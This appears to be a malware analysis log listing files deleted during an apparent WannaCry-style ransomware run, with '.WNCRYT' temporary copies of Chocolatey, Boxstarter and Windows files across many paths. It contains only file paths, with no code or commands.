DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxstarterShell.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\chocolateyUninstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\setup.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1.WNCRYT
DeletedFile: C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRY
DeletedFile: C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db.WNCRYT
DeletedFile: C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.WNCRYT
